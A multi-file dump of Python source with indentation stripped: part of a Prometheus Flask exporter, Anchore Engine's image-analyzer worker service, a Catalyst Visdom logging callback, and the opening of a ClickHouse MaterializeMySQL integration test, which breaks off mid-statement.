@wraps(f)
def func(*args, **kwargs):
request.prom_do_not_track = True
return f(*args, **kwargs)
return func
return decorator
@staticmethod
def exclude_all_metrics():
"""
Decorator to skip all metrics collection for the method.
"""
def decorator(f):
@wraps(f)
def func(*args, **kwargs):
request.prom_exclude_all = True
return f(*args, **kwargs)
return func
return decorator
def info(self, name, description, labelnames=None, labelvalues=None, **labels):
"""
Report any information as a Prometheus metric.
This will create a `Gauge` with the initial value of 1.
The easiest way to use it is:
metrics = PrometheusMetrics(app)
metrics.info(
'app_info', 'Application info',
version='1.0', major=1, minor=0
)
If the order of the labels matters:
metrics = PrometheusMetrics(app)
metrics.info(
'app_info', 'Application info',
('version', 'major', 'minor'),
('1.0', 1, 0)
)
:param name: the name of the metric
:param description: the description of the metric
:param labelnames: the names of the labels
:param labelvalues: the values of the labels
:param labels: the names and values of the labels
:return: the newly created `Gauge` metric
"""
if labels and labelnames:
raise ValueError(
'Cannot have labels defined as `dict` '
'and collections of names and values'
)
if labelnames is None and labels:
labelnames = labels.keys()
elif labelnames and labelvalues:
for idx, label_name in enumerate(labelnames):
labels[label_name] = labelvalues[idx]
gauge = Gauge(
name, description, labelnames or tuple(),
registry=self.registry
)
if labels:
gauge = gauge.labels(**labels)
gauge.set(1)
return gauge
@staticmethod
def _is_string(value):
try:
return isinstance(value, basestring) # python2
except NameError:
return isinstance(value, str) # python3
__version__ = '0.13.0'
|
__init__.py
|
import copy
import os
import threading
import time
import json
import operator
import pkg_resources
# anchore modules
import anchore_engine.clients.localanchore_standalone
import anchore_engine.common.helpers
from anchore_engine.clients.services import internal_client_for
from anchore_engine.clients.services.simplequeue import SimpleQueueClient
from anchore_engine.clients.services.catalog import CatalogClient
from anchore_engine.clients.services.policy_engine import PolicyEngineClient
from anchore_engine.clients import localanchore_standalone
import anchore_engine.configuration.localconfig
import anchore_engine.subsys.servicestatus
import anchore_engine.subsys.metrics
import anchore_engine.common
import anchore_engine.subsys.taskstate
import anchore_engine.subsys.notifications
from anchore_engine.subsys import logger
from anchore_engine.utils import AnchoreException
import anchore_engine.subsys.events as events
from anchore_engine.subsys.identities import manager_factory
from anchore_engine.service import ApiService
from anchore_engine.db import session_scope
############################################
queuename = "images_to_analyze"
system_user_auth = ('anchore-system', '')
#current_avg = 0.0
#current_avg_count = 0.0
def perform_analyze(userId, manifest, image_record, registry_creds, layer_cache_enable=False):
return perform_analyze_nodocker(userId, manifest, image_record, registry_creds, layer_cache_enable=layer_cache_enable)
def perform_analyze_nodocker(userId, manifest, image_record, registry_creds, layer_cache_enable=False):
ret_analyze = {}
ret_query = {}
localconfig = anchore_engine.configuration.localconfig.get_config()
try:
tmpdir = localconfig['tmp_dir']
except Exception as err:
logger.warn("could not get tmp_dir from localconfig - exception: " + str(err))
tmpdir = "/tmp"
use_cache_dir=None
if layer_cache_enable:
use_cache_dir = os.path.join(tmpdir, "anchore_layercache")
# choose the first TODO possible more complex selection here
try:
image_detail = image_record['image_detail'][0]
registry_manifest = manifest
pullstring = image_detail['registry'] + "/" + image_detail['repo'] + "@" + image_detail['imageDigest']
fulltag = image_detail['registry'] + "/" + image_detail['repo'] + ":" + image_detail['tag']
logger.debug("using pullstring ("+str(pullstring)+") and fulltag ("+str(fulltag)+") to pull image data")
except Exception as err:
image_detail = pullstring = fulltag = None
raise Exception("failed to extract requisite information from image_record - exception: " + str(err))
timer = int(time.time())
logger.spew("timing: analyze start: " + str(int(time.time()) - timer))
logger.info("performing analysis on image: " + str([userId, pullstring, fulltag]))
logger.debug("obtaining anchorelock..." + str(pullstring))
with anchore_engine.clients.localanchore_standalone.get_anchorelock(lockId=pullstring, driver='nodocker'):
logger.debug("obtaining anchorelock successful: " + str(pullstring))
analyzed_image_report = localanchore_standalone.analyze_image(userId, registry_manifest, image_record, tmpdir, localconfig, registry_creds=registry_creds, use_cache_dir=use_cache_dir)
ret_analyze = analyzed_image_report
logger.info("performing analysis on image complete: " + str(pullstring))
return (ret_analyze)
def process_analyzer_job(system_user_auth, qobj, layer_cache_enable):
global servicename #current_avg, current_avg_count
timer = int(time.time())
event = None
try:
logger.debug('dequeued object: {}'.format(qobj))
record = qobj['data']
userId = record['userId']
imageDigest = record['imageDigest']
manifest = record['manifest']
# check to make sure image is still in DB
catalog_client = internal_client_for(CatalogClient, userId)
try:
image_record = catalog_client.get_image(imageDigest)
if not image_record:
raise Exception("empty image record from catalog")
except Exception as err:
logger.warn("dequeued image cannot be fetched from catalog - skipping analysis (" + str(imageDigest) + ") - exception: " + str(err))
return (True)
logger.info("image dequeued for analysis: " + str(userId) + " : " + str(imageDigest))
if image_record['analysis_status'] != anchore_engine.subsys.taskstate.base_state('analyze'):
logger.debug("dequeued image is not in base state - skipping analysis")
return(True)
try:
logger.spew("TIMING MARK0: " + str(int(time.time()) - timer))
last_analysis_status = image_record['analysis_status']
image_record['analysis_status'] = anchore_engine.subsys.taskstate.working_state('analyze')
rc = catalog_client.update_image(imageDigest, image_record)
# disable the webhook call for image state transistion to 'analyzing'
#try:
# for image_detail in image_record['image_detail']:
# fulltag = image_detail['registry'] + "/" + image_detail['repo'] + ":" + image_detail['tag']
# npayload = {
# 'last_eval': {'imageDigest': imageDigest, 'analysis_status': last_analysis_status},
# 'curr_eval': {'imageDigest': imageDigest, 'analysis_status': image_record['analysis_status']},
# }
# rc = anchore_engine.subsys.notifications.queue_notification(userId, fulltag, 'analysis_update', npayload)
#except Exception as err:
# logger.warn("failed to enqueue notification on image analysis state update - exception: " + str(err))
# actually do analysis
registry_creds = catalog_client.get_registry()
try:
image_data = perform_analyze(userId, manifest, image_record, registry_creds, layer_cache_enable=layer_cache_enable)
except AnchoreException as e:
event = events.AnalyzeImageFail(user_id=userId, image_digest=imageDigest, error=e.to_dict())
raise
imageId = None
try:
imageId = image_data[0]['image']['imageId']
except Exception as err:
logger.warn("could not get imageId after analysis or from image record - exception: " + str(err))
try:
logger.debug("archiving analysis data")
rc = catalog_client.put_document('analysis_data', imageDigest, image_data)
except Exception as e:
err = CatalogClientError(msg='Failed to upload analysis data to catalog', cause=e)
event = events.ArchiveAnalysisFail(user_id=userId, image_digest=imageDigest, error=err.to_dict())
raise err
if rc:
try:
logger.debug("extracting image content data")
image_content_data = {}
for content_type in anchore_engine.common.image_content_types + anchore_engine.common.image_metadata_types:
try:
image_content_data[content_type] = anchore_engine.common.helpers.extract_analyzer_content(image_data, content_type, manifest=manifest)
except:
image_content_data[content_type] = {}
if image_content_data:
logger.debug("adding image content data to archive")
rc = catalog_client.put_document('image_content_data', imageDigest, image_content_data)
try:
logger.debug("adding image analysis data to image_record")
anchore_engine.common.helpers.update_image_record_with_analysis_data(image_record, image_data)
except Exception as err:
raise err
except Exception as err:
import traceback
traceback.print_exc()
logger.warn("could not store image content metadata to archive - exception: " + str(err))
logger.debug("adding image record to policy-engine service (" + str(userId) + " : " + str(imageId) + ")")
try:
if not imageId:
raise Exception("cannot add image to policy engine without an imageId")
localconfig = anchore_engine.configuration.localconfig.get_config()
verify = localconfig['internal_ssl_verify']
pe_client = internal_client_for(PolicyEngineClient, userId)
try:
logger.debug("clearing any existing record in policy engine for image: " + str(imageId))
rc = pe_client.delete_image(user_id=userId, image_id=imageId)
except Exception as err:
logger.warn("exception on pre-delete - exception: " + str(err))
logger.info('Loading image into policy engine: {} {}'.format(userId, imageId))
image_analysis_fetch_url='catalog://'+str(userId)+'/analysis_data/'+str(imageDigest)
logger.debug("policy engine request: " + image_analysis_fetch_url)
resp = pe_client.ingress_image(userId, imageId, image_analysis_fetch_url)
logger.debug("policy engine image add response: " + str(resp))
except Exception as err:
newerr = PolicyEngineClientError(msg='Adding image to policy-engine failed', cause=str(err))
event = events.LoadAnalysisFail(user_id=userId, image_digest=imageDigest, error=newerr.to_dict())
raise newerr
logger.debug("updating image catalog record analysis_status")
last_analysis_status = image_record['analysis_status']
image_record['analysis_status'] = anchore_engine.subsys.taskstate.complete_state('analyze')
image_record['analyzed_at'] = int(time.time())
rc = catalog_client.update_image(imageDigest, image_record)
try:
annotations = {}
try:
if image_record.get('annotations', '{}'):
annotations = json.loads(image_record.get('annotations', '{}'))
except Exception as err:
logger.warn("could not marshal annotations from json - exception: " + str(err))
for image_detail in image_record['image_detail']:
fulltag = image_detail['registry'] + "/" + image_detail['repo'] + ":" + image_detail['tag']
last_payload = {'imageDigest': imageDigest, 'analysis_status': last_analysis_status, 'annotations': annotations}
curr_payload = {'imageDigest': imageDigest, 'analysis_status': image_record['analysis_status'], 'annotations': annotations}
npayload = {
'last_eval': last_payload,
'curr_eval': curr_payload,
}
if annotations:
npayload['annotations'] = annotations
rc = anchore_engine.subsys.notifications.queue_notification(userId, fulltag, 'analysis_update', npayload)
except Exception as err:
logger.warn("failed to enqueue notification on image analysis state update - exception: " + str(err))
else:
err = CatalogClientError(msg='Failed to upload analysis data to catalog', cause='Invalid response from catalog API - {}'.format(str(rc)))
event = events.ArchiveAnalysisFail(user_id=userId, image_digest=imageDigest, error=err.to_dict())
raise err
logger.info("analysis complete: " + str(userId) + " : " + str(imageDigest))
logger.spew("TIMING MARK1: " + str(int(time.time()) - timer))
try:
run_time = float(time.time() - timer)
#current_avg_count = current_avg_count + 1.0
#new_avg = current_avg + ((run_time - current_avg) / current_avg_count)
#current_avg = new_avg
anchore_engine.subsys.metrics.histogram_observe('anchore_analysis_time_seconds', run_time, buckets=[1.0, 5.0, 10.0, 30.0, 60.0, 120.0, 300.0, 600.0, 1800.0, 3600.0], status="success")
#anchore_engine.subsys.metrics.counter_inc('anchore_images_analyzed_total')
#localconfig = anchore_engine.configuration.localconfig.get_config()
#service_record = {'hostid': localconfig['host_id'], 'servicename': servicename}
#anchore_engine.subsys.servicestatus.set_status(service_record, up=True, available=True, detail={'avg_analysis_time_sec': current_avg, 'total_analysis_count': current_avg_count}, update_db=True)
except Exception as err:
logger.warn(str(err))
pass
except Exception as err:
run_time = float(time.time() - timer)
logger.exception("problem analyzing image - exception: " + str(err))
anchore_engine.subsys.metrics.histogram_observe('anchore_analysis_time_seconds', run_time, buckets=[1.0, 5.0, 10.0, 30.0, 60.0, 120.0, 300.0, 600.0, 1800.0, 3600.0], status="fail")
image_record['analysis_status'] = anchore_engine.subsys.taskstate.fault_state('analyze')
image_record['image_status'] = anchore_engine.subsys.taskstate.fault_state('image_status')
rc = catalog_client.update_image(imageDigest, image_record)
finally:
if event:
try:
catalog_client.add_event(event)
except:
logger.error('Ignoring error creating analysis failure event')
except Exception as err:
logger.warn("job processing bailed - exception: " + str(err))
raise err
return (True)
# TODO should probably be defined in and raised by the clients
class CatalogClientError(AnchoreException):
def __init__(self, cause, msg='Failed to execute out catalog API'):
self.cause = str(cause)
self.msg = msg
def __repr__(self):
return '{} - exception: {}'.format(self.msg, self.cause)
def __str__(self):
return '{} - exception: {}'.format(self.msg, self.cause)
class PolicyEngineClientError(AnchoreException):
def __init__(self, cause, msg='Failed to execute out policy engine API'):
self.cause = str(cause)
self.msg = msg
def __repr__(self):
return '{} - exception: {}'.format(self.msg, self.cause)
def __str__(self):
return '{} - exception: {}'.format(self.msg, self.cause)
def handle_layer_cache(**kwargs):
try:
localconfig = anchore_engine.configuration.localconfig.get_config()
myconfig = localconfig['services']['analyzer']
cachemax_gbs = int(myconfig.get('layer_cache_max_gigabytes', 1))
cachemax = cachemax_gbs * 1000000000
try:
tmpdir = localconfig['tmp_dir']
except Exception as err:
logger.warn("could not get tmp_dir from localconfig - exception: " + str(err))
tmpdir = "/tmp"
use_cache_dir = os.path.join(tmpdir, "anchore_layercache")
if os.path.exists(use_cache_dir):
totalsize = 0
layertimes = {}
layersizes = {}
try:
for f in os.listdir(os.path.join(use_cache_dir, 'sha256')):
layerfile = os.path.join(use_cache_dir, 'sha256', f)
layerstat = os.stat(layerfile)
totalsize = totalsize + layerstat.st_size
layersizes[layerfile] = layerstat.st_size
layertimes[layerfile] = max([layerstat.st_mtime, layerstat.st_ctime, layerstat.st_atime])
if totalsize > cachemax:
logger.debug("layer cache total size ("+str(totalsize)+") exceeds configured cache max ("+str(cachemax)+") - performing cleanup")
currsize = totalsize
sorted_layers = sorted(list(layertimes.items()), key=operator.itemgetter(1))
while(currsize > cachemax):
rmlayer = sorted_layers.pop(0)
logger.debug("removing cached layer: " + str(rmlayer))
os.remove(rmlayer[0])
currsize = currsize - layersizes[rmlayer[0]]
logger.debug("currsize after remove: " + str(currsize))
except Exception as err:
raise(err)
except Exception as err:
raise(err)
return(True)
def handle_image_analyzer(*args, **kwargs):
"""
Processor for image analysis requests coming from the work queue
:param args:
:param kwargs:
:return:
"""
global system_user_auth, queuename, servicename
cycle_timer = kwargs['mythread']['cycle_timer']
localconfig = anchore_engine.configuration.localconfig.get_config()
system_user_auth = localconfig['system_user_auth']
threads = []
layer_cache_dirty = True
while(True):
logger.debug("analyzer thread cycle start")
try:
myconfig = localconfig['services']['analyzer']
max_analyze_threads = int(myconfig.get('max_threads', 1))
layer_cache_enable = myconfig.get('layer_cache_enable', False)
logger.debug("max threads: " + str(max_analyze_threads))
q_client = internal_client_for(SimpleQueueClient, userId=None)
if len(threads) < max_analyze_threads:
logger.debug("analyzer has free worker threads {} / {}".format(len(threads), max_analyze_threads))
qobj = q_client.dequeue(queuename)
if qobj:
logger.debug("got work from queue task Id: {}".format(qobj.get('queueId', 'unknown')))
myqobj = copy.deepcopy(qobj)
logger.spew("incoming queue object: " + str(myqobj))
logger.debug("incoming queue task: " + str(list(myqobj.keys())))
logger.debug("starting thread")
athread = threading.Thread(target=process_analyzer_job, args=(system_user_auth, myqobj,layer_cache_enable))
athread.start()
threads.append(athread)
logger.debug("thread started")
layer_cache_dirty = True
else:
logger.debug("analyzer queue is empty - no work this cycle")
else:
logger.debug("all workers are busy")
alive_threads = []
while(threads):
athread = threads.pop()
if not athread.isAlive():
try:
logger.debug("thread completed - joining")
athread.join()
logger.debug("thread joined")
except Exception as err:
logger.warn("cannot join thread - exception: " + str(err))
else:
alive_threads.append(athread)
threads = alive_threads
if layer_cache_enable and layer_cache_dirty and len(threads) == 0:
logger.debug("running layer cache handler")
try:
handle_layer_cache()
layer_cache_dirty = False
except Exception as err:
logger.warn("layer cache management failed - exception: " + str(err))
except Exception as err:
logger.exception('Failure in image analysis loop')
logger.debug("analyzer thread cycle complete: next in "+str(cycle_timer))
time.sleep(cycle_timer)
return(True)
def handle_metrics(*args, **kwargs):
cycle_timer = kwargs['mythread']['cycle_timer']
while(True):
try:
localconfig = anchore_engine.configuration.localconfig.get_config()
try:
tmpdir = localconfig['tmp_dir']
svfs = os.statvfs(tmpdir)
available_bytes = svfs.f_bsize * svfs.f_bavail
anchore_engine.subsys.metrics.gauge_set("anchore_tmpspace_available_bytes", available_bytes)
except Exception as err:
logger.warn("unable to detect available bytes probe - exception: " + str(err))
except Exception as err:
logger.warn("handler failed - exception: " + str(err))
time.sleep(cycle_timer)
return(True)
# monitor infrastructure
# monitors = {
# 'service_heartbeat': {'handler': anchore_engine.subsys.servicestatus.handle_service_heartbeat, 'taskType': 'handle_service_heartbeat', 'args': [AnalyzerService.__service_name__], 'cycle_timer': 60, 'min_cycle_timer': 60, 'max_cycle_timer': 60, 'last_queued': 0, 'last_return': False, 'initialized': False},
# 'image_analyzer': {'handler': handle_image_analyzer, 'taskType': 'handle_image_analyzer', 'args': [], 'cycle_timer': 1, 'min_cycle_timer': 1, 'max_cycle_timer': 120, 'last_queued': 0, 'last_return': False, 'initialized': False},
# 'handle_metrics': {'handler': handle_metrics, 'taskType': 'handle_metrics', 'args': [servicename], 'cycle_timer': 15, 'min_cycle_timer': 15, 'max_cycle_timer': 15, 'last_queued': 0, 'last_return': False, 'initialized': False},
# }
# monitor_threads = {}
class AnalyzerService(ApiService):
__service_name__ = 'analyzer'
__spec_dir__ = pkg_resources.resource_filename(__name__, 'swagger')
__service_api_version__ = 'v1'
__monitors__ = {
'service_heartbeat': {'handler': anchore_engine.subsys.servicestatus.handle_service_heartbeat, 'taskType': 'handle_service_heartbeat', 'args': [__service_name__], 'cycle_timer': 60, 'min_cycle_timer': 60, 'max_cycle_timer': 60, 'last_queued': 0, 'last_return': False, 'initialized': False},
'image_analyzer': {'handler': handle_image_analyzer, 'taskType': 'handle_image_analyzer', 'args': [], 'cycle_timer': 5, 'min_cycle_timer': 1, 'max_cycle_timer': 120, 'last_queued': 0, 'last_return': False, 'initialized': False},
'handle_metrics': {'handler': handle_metrics, 'taskType': 'handle_metrics', 'args': [__service_name__], 'cycle_timer': 15, 'min_cycle_timer': 15, 'max_cycle_timer': 15, 'last_queued': 0, 'last_return': False, 'initialized': False},
}
|
visdom_logger.py
|
from typing import Dict, List, Union
from collections import Counter
import logging
import queue
import threading
import time
from alchemy.logger import Logger
import visdom
from catalyst.core.callback import (
Callback,
CallbackNode,
CallbackOrder,
CallbackScope,
)
from catalyst.core.runner import IRunner
class Visdom(Logger):
"""Logger, translates ``runner.*_metrics`` to Visdom.
Read about Visdom here https://github.com/facebookresearch/visdom
Example:
.. code-block:: python
VisdomLogger(
env_name="...", # enviroment name
server="localhost", # visdom server name
port=8097, # visdom server port
)
"""
def __init__(
self,
env_name: str,
batch_size: int = None,
server: str = "localhost",
port: int = 8097,
log_to_filename: str = None,
username: str = None,
password: str = None,
):
"""
Args:
env_name (str): Environment name to plot to when
no env is provided (default: main)
batch_size (int): batch_size for log_on_batch_end
server (str): the hostname of your
visdom server (default: 'http://localhost')
port (str): the port for your visdom server (default: 8097)
log_to_filename (str): logs per-epoch metrics if set True
username (str): username to use for authentication,
if server started with -enable_login (default: None)
password (str): password to use for authentication,
if server started with -enable_login (default: None)
"""
self._batch_size = max(int(batch_size or int(1e3)), 1)
self._counters = Counter()
self._queue = queue.Queue()
self._thread = threading.Thread(target=self._run_worker)
self._thread.start()
try:
self.viz = visdom.Visdom(
server=server,
port=port,
env=env_name,
log_to_filename=log_to_filename,
username=username,
password=password,
)
startup_sec = 1
while not self.viz.check_connection() and startup_sec > 0:
time.sleep(0.1)
startup_sec -= 0.1
assert (
self.viz.check_connection()
), "No connection could be formed quickly"
except BaseException as e:
logging.error(
"The visdom experienced an exception while"
+ "running: {}".format(repr(e))
)
def _run_worker(self):
"""Runs worker to gather batch statistics."""
running = True
while running:
batch = []
try:
while len(batch) < self._batch_size:
if batch:
msg = self._queue.get_nowait()
else:
msg = self._queue.get()
if msg is None:
running = False
break
batch.append(msg)
except queue.Empty:
pass
if batch:
self.plot_lines(batch)
def plot_lines(self, batch: List[Dict]):
"""Plots vales from batch statistics.
Args:
batch (List[Dict]): List with dictionaries from log_scalar
"""
for msg in batch:
opts = {
"xlabel": "epochs",
"legend": ["train", "valid"],
"ylabel": msg["name"],
"title": msg["name"],
}
self.viz.line(
X=[self._counters[msg["full_name"]]],
Y=[msg["value"]],
win=msg["name"],
name=msg["mode"],
update="append",
opts=opts,
)
def log_scalar(
self, name: str, mode: str, full_name: str, value: Union[int, float],
):
"""Logs scalar.
Args:
name (str): Environment name to plot to when
no env is provided (default: main)
mode (str): Metric's mode (example: train)
full_name (str): Full metric name
value (Union[int, float]): Metric's value
"""
self._queue.put(
{
"name": name,
"full_name": full_name,
"mode": mode,
"value": value,
"step": self._counters[full_name],
}
)
self._counters[full_name] += 1
class VisdomLogger(Callback):
"""Logger callback, translates ``runner.*_metrics`` to Visdom.
Read about Visdom here https://github.com/facebookresearch/visdom
Example:
.. code-block:: python
from catalyst.dl import SupervisedRunner, VisdomLogger
runner = SupervisedRunner()
runner.train(
model=model,
criterion=criterion,
optimizer=optimizer,
loaders=loaders,
logdir=logdir,
num_epochs=num_epochs,
verbose=True,
callbacks={
"logger": VisdomLogger(
env_name="...", # enviroment name
server="localhost", # visdom server name
port=8097, # visdom server port
)
}
)
"""
def __init__(
self,
metric_names: List[str] = None,
log_on_batch_end: bool = False,
log_on_epoch_end: bool = True,
**logging_params,
):
"""
Args:
metric_names (List[str]): list of metric names to log,
if none - logs everything
log_on_batch_end (bool): logs per-batch metrics if set True
log_on_epoch_end (bool): logs per-epoch metrics if set True
"""
super().__init__(
order=CallbackOrder.Logging,
node=CallbackNode.Master,
scope=CallbackScope.Experiment,
)
self.metrics_to_log = metric_names
self.log_on_batch_end = log_on_batch_end
self.log_on_epoch_end = log_on_epoch_end
if not (self.log_on_batch_end or self.log_on_epoch_end):
raise ValueError("You have to log something!")
if (self.log_on_batch_end and not self.log_on_epoch_end) or (
not self.log_on_batch_end and self.log_on_epoch_end
):
self.batch_log_suffix = ""
self.epoch_log_suffix = ""
else:
self.batch_log_suffix = "_batch"
self.epoch_log_suffix = "_epoch"
self.logger = Visdom(**logging_params)
def _log_metrics(
self, metrics: Dict[str, float], step: int, mode: str, suffix=""
):
"""Translate batch metrics to Visdom logger.
Args:
metrics (Dict[str, float]): Metrics from Catalyst
step (int): Iteration step from Catalyst
mode (str): Metric's mode (example: train)
suffix (str): Additional suffix
"""
if self.metrics_to_log is None:
metrics_to_log = sorted(metrics.keys())
else:
metrics_to_log = self.metrics_to_log
for name in metrics_to_log:
if name in metrics:
# Renaming catalyst metric names to visdom formatting
real_mode = name.split("_")[0]
splitted_name = name.split(real_mode + "_")[-1]
metric_name = f"{splitted_name}{suffix}"
full_metric_name = f"{real_mode}/{metric_name}"
metric_value = metrics[name]
# Log values
self.logger.log_scalar(
metric_name, real_mode, full_metric_name, metric_value
)
def __del__(self):
"""@TODO: Docs. Contribution is welcome."""
self.logger.close()
def on_batch_end(self, runner: IRunner):
"""Translate batch metrics to Visdom."""
if self.log_on_batch_end:
mode = runner.loader_name
metrics_ = runner.batch_metrics
self._log_metrics(
metrics=metrics_,
step=runner.global_sample_step,
mode=mode,
suffix=self.batch_log_suffix,
)
def on_epoch_end(self, runner: IRunner):
"""Translate epoch metrics to Visdom."""
if self.log_on_epoch_end:
self._log_metrics(
metrics=runner.epoch_metrics,
step=runner.global_epoch,
mode=runner.loader_name,
suffix=self.epoch_log_suffix,
)
__all__ = ["VisdomLogger"]
|
materialize_with_ddl.py
|
import time
import pymysql.cursors
import pytest
from helpers.network import PartitionManager
import logging
from helpers.client import QueryRuntimeException
from helpers.cluster import get_docker_compose_path, run_and_check
import random
import threading
from multiprocessing.dummy import Pool
from helpers.test_tools import assert_eq_with_retry
def check_query(clickhouse_node, query, result_set, retry_count=10, interval_seconds=3):
lastest_result = ''
for i in range(retry_count):
try:
lastest_result = clickhouse_node.query(query)
if result_set == lastest_result:
return
logging.debug(f"latest_result {lastest_result}")
time.sleep(interval_seconds)
except Exception as e:
logging.debug(f"check_query retry {i+1} exception {e}")
time.sleep(interval_seconds)
else:
assert clickhouse_node.query(query) == result_set
def dml_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_dml")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_dml")
mysql_node.query("CREATE DATABASE test_database_dml DEFAULT CHARACTER SET 'utf8'")
# existed before the mapping was created
mysql_node.query("CREATE TABLE test_database_dml.test_table_1 ("
"`key` INT NOT NULL PRIMARY KEY, "
"unsigned_tiny_int TINYINT UNSIGNED, tiny_int TINYINT, "
"unsigned_small_int SMALLINT UNSIGNED, small_int SMALLINT, "
"unsigned_medium_int MEDIUMINT UNSIGNED, medium_int MEDIUMINT, "
"unsigned_int INT UNSIGNED, _int INT, "
"unsigned_integer INTEGER UNSIGNED, _integer INTEGER, "
"unsigned_bigint BIGINT UNSIGNED, _bigint BIGINT, "
"/* Need ClickHouse support read mysql decimal unsigned_decimal DECIMAL(19, 10) UNSIGNED, _decimal DECIMAL(19, 10), */"
"unsigned_float FLOAT UNSIGNED, _float FLOAT, "
"unsigned_double DOUBLE UNSIGNED, _double DOUBLE, "
"_varchar VARCHAR(10), _char CHAR(10), binary_col BINARY(8), "
"/* Need ClickHouse support Enum('a', 'b', 'v') _enum ENUM('a', 'b', 'c'), */"
"_date Date, _datetime DateTime, _timestamp TIMESTAMP, _bool BOOLEAN) ENGINE = InnoDB;")
# it already has some data
mysql_node.query("""
INSERT INTO test_database_dml.test_table_1 VALUES(1, 1, -1, 2, -2, 3, -3, 4, -4, 5, -5, 6, -6, 3.2, -3.2, 3.4, -3.4, 'varchar', 'char', 'binary',
'2020-01-01', '2020-01-01 00:00:00', '2020-01-01 00:00:00', true);
""")
clickhouse_node.query(
"CREATE DATABASE test_database_dml ENGINE = MaterializeMySQL('{}:3306', 'test_database_dml', 'root', 'clickhouse')".format(
service_name))
assert "test_database_dml" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SELECT * FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV",
"1\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t"
"2020-01-01 00:00:00\t2020-01-01 00:00:00\t1\n")
mysql_node.query("""
INSERT INTO test_database_dml.test_table_1 VALUES(2, 1, -1, 2, -2, 3, -3, 4, -4, 5, -5, 6, -6, 3.2, -3.2, 3.4, -3.4, 'varchar', 'char', 'binary',
'2020-01-01', '2020-01-01 00:00:00', '2020-01-01 00:00:00', false);
""")
check_query(clickhouse_node, "SELECT * FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV",
"1\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t"
"2020-01-01 00:00:00\t2020-01-01 00:00:00\t1\n2\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\t"
"varchar\tchar\tbinary\\0\\0\t2020-01-01\t2020-01-01 00:00:00\t2020-01-01 00:00:00\t0\n")
mysql_node.query("UPDATE test_database_dml.test_table_1 SET unsigned_tiny_int = 2 WHERE `key` = 1")
check_query(clickhouse_node, """
SELECT key, unsigned_tiny_int, tiny_int, unsigned_small_int,
small_int, unsigned_medium_int, medium_int, unsigned_int, _int, unsigned_integer, _integer,
unsigned_bigint, _bigint, unsigned_float, _float, unsigned_double, _double, _varchar, _char, binary_col,
_date, _datetime, /* exclude it, because ON UPDATE CURRENT_TIMESTAMP _timestamp, */
_bool FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV
""",
"1\t2\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t"
"2020-01-01 00:00:00\t1\n2\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\t"
"varchar\tchar\tbinary\\0\\0\t2020-01-01\t2020-01-01 00:00:00\t0\n")
# update primary key
mysql_node.query("UPDATE test_database_dml.test_table_1 SET `key` = 3 WHERE `unsigned_tiny_int` = 2")
check_query(clickhouse_node, "SELECT key, unsigned_tiny_int, tiny_int, unsigned_small_int,"
" small_int, unsigned_medium_int, medium_int, unsigned_int, _int, unsigned_integer, _integer, "
" unsigned_bigint, _bigint, unsigned_float, _float, unsigned_double, _double, _varchar, _char, binary_col, "
" _date, _datetime, /* exclude it, because ON UPDATE CURRENT_TIMESTAMP _timestamp, */ "
" _bool FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV",
"2\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\t"
"varchar\tchar\tbinary\\0\\0\t2020-01-01\t2020-01-01 00:00:00\t0\n3\t2\t-1\t2\t-2\t3\t-3\t"
"4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t2020-01-01 00:00:00\t1\n")
mysql_node.query('DELETE FROM test_database_dml.test_table_1 WHERE `key` = 2')
check_query(clickhouse_node, "SELECT key, unsigned_tiny_int, tiny_int, unsigned_small_int,"
" small_int, unsigned_medium_int, medium_int, unsigned_int, _int, unsigned_integer, _integer, "
" unsigned_bigint, _bigint, unsigned_float, _float, unsigned_double, _double, _varchar, _char, binary_col, "
" _date, _datetime, /* exclude it, because ON UPDATE CURRENT_TIMESTAMP _timestamp, */ "
" _bool FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV",
"3\t2\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t"
"2020-01-01 00:00:00\t1\n")
mysql_node.query('DELETE FROM test_database_dml.test_table_1 WHERE `unsigned_tiny_int` = 2')
check_query(clickhouse_node, "SELECT * FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV", "")
clickhouse_node.query("DROP DATABASE test_database_dml")
mysql_node.query("DROP DATABASE test_database_dml")
def materialized_mysql_database_with_views(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database")
mysql_node.query("CREATE DATABASE test_database DEFAULT CHARACTER SET 'utf8'")
# existed before the mapping was created
mysql_node.query("CREATE TABLE test_database.test_table_1 ("
"`key` INT NOT NULL PRIMARY KEY, "
"unsigned_tiny_int TINYINT UNSIGNED, tiny_int TINYINT, "
"unsigned_small_int SMALLINT UNSIGNED, small_int SMALLINT, "
"unsigned_medium_int MEDIUMINT UNSIGNED, medium_int MEDIUMINT, "
"unsigned_int INT UNSIGNED, _int INT, "
"unsigned_integer INTEGER UNSIGNED, _integer INTEGER, "
"unsigned_bigint BIGINT UNSIGNED, _bigint BIGINT, "
